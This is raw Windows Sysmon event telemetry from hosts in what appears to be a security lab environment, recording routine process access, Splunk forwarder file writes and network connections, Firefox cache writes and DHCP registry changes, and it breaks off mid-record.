11:32:20.206{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1B44-6216-9F07-000000003802}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B44-6216-9F07-000000003802}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.207{C8EA50B7-1B44-6216-9F07-000000003802}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000300307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.045{C8EA50B7-1B43-6216-9E07-000000003802}4172968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:21.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FB6F4C1E3363FD31909E55B5B3C3BFC,SHA256=009D04C09213027ED1AAC65761EF6AD4919E1C35ED6121FD331AB17C8DE694C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:21.065{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07CC87F6DBB7D01F9CF59728D44DB29F,SHA256=764C573082CC50A97BD46DC3FA2870C933DFD82DC7693817BF6C7572F2B39A24,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:18.696{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51830-false10.0.1.12-8000- 10341000x8000000000000000300334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.495{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000300333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.479{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.479{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFa4ca37.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.464{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\jumpListCache\ys7eAURmt1KFK80B+QyQ7A==.icoMD5=5283871D06B45C07646CDF6A0FFF9A16,SHA256=07BA4C406989DC0E2548F74977949408459203A7F447288A3F6046984C265F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.464{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\jumpListCache\Y23T8d9lHvSIXJP9yv8OKA==.icoMD5=5283871D06B45C07646CDF6A0FFF9A16,SHA256=07BA4C406989DC0E2548F74977949408459203A7F447288A3F6046984C265F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.464{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\jumpListCache\pV+3TL7Nu3EP5juvr_gPjg==.icoMD5=7E5552B68E2FDC5D7E55E3078595E4C3,SHA256=F72D06E7237C4F31769D71E5468207250CD541268075DA0399204E8A8E460BD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.448{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\jumpListCache\AzAyZ2ZDjtKb25yb176Y9w==.icoMD5=5283871D06B45C07646CDF6A0FFF9A16,SHA256=07BA4C406989DC0E2548F74977949408459203A7F447288A3F6046984C265F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:22.080{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F341904D58D1548DD5A1F84F99A17ED,SHA256=98C11CD3DFF3B60C443CFFD9DB25958B4B67B76EE020515CE8E1C3B62FD9D050,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:23.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30570BF0DAC9D2124B79B72EDF4BB903,SHA256=0B7A7E9088CE6FA668ED480627FAB6E30B672A8CD9177732ECFF449F6DAFB0D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:23.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8733D2AF8EA47E8E8C9A0DFA222736D7,SHA256=61BF627FF9297DE7ADE906856F38B16CCEFE9E0268BEECDAE658183D589B82CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:24.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F75B6114EFE8DDE044E620EE801BD6A,SHA256=1FE9E3D228828232D9D4F06012F2254D7212C8859D114F838626EE5B0FA0D281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:24.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF17323FFF8F2A53A92AE14500A4C4E,SHA256=DFE48E895655195EE5C3EFF4816066B9C30E12217134F54BDFD5141739F42A25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:25.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB208A2FA3DA4A2356DB930D865705F8,SHA256=BA40F473C89B9EB3D48D3F758DECCA930D619202005D957EF2879671A3B6043D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:25.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92BAF0440A82DD4DFB76B859B5D79C4,SHA256=D148A7BD5332FA184B28C5F3F8E822CBAE83EB3EF950FC3AAE0BDC2AAE35100D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:26.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EECAAA48397286D755A312FF8170379,SHA256=9FF611EB376E81195A2B21E63A3D81E4D9DE28861392C29AA89A9F2CE184B930,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:24.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49715-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:26.363{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=01FF7000237B4C38D715006DDF9DCBE6,SHA256=0305262E4F4C6666B80C5C7FF98686FEF6656D8DAC3CCE37022CB1A770581F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:26.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CD5AB95764BC28318602091D48A5AB1,SHA256=1C7FA8C680589A97A514D17D97D793D4678FD9EB1DA4F5AB1A3C5A75E93A92B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:24.539{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51831-false10.0.1.12-8000- 23542300x8000000000000000224078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:27.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950F78E3DE6B80267201837DD3D4CEE0,SHA256=7DBC1771B9652E97BE9EB686D69ED20337F58482C0FF0489205D60A508CEF806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:27.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1594D861E01DCB23764CF10E49A41099,SHA256=678F7D2378EC5DEB59B31F86E4F3A652B17A7E72A2506ABC1F224C9ACD306BE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.971{4F8D34B0-F11B-6215-0B00-000000003902}6323192C:\Windows\system32\lsass.exe{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.971{4F8D34B0-F11B-6215-0B00-000000003902}6323192C:\Windows\system32\lsass.exe{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11B-6215-0B00-000000003902}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11B-6215-0B00-000000003902}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.971{4F8D34B0-F11B-6215-0B00-000000003902}6323192C:\Windows\system32\lsass.exe{4F8D34B0-F11B-6215-0A00-000000003902}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b8ad|C:\Windows\system32\lsasrv.dll+2878b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000224091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000224090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000224089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000224088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 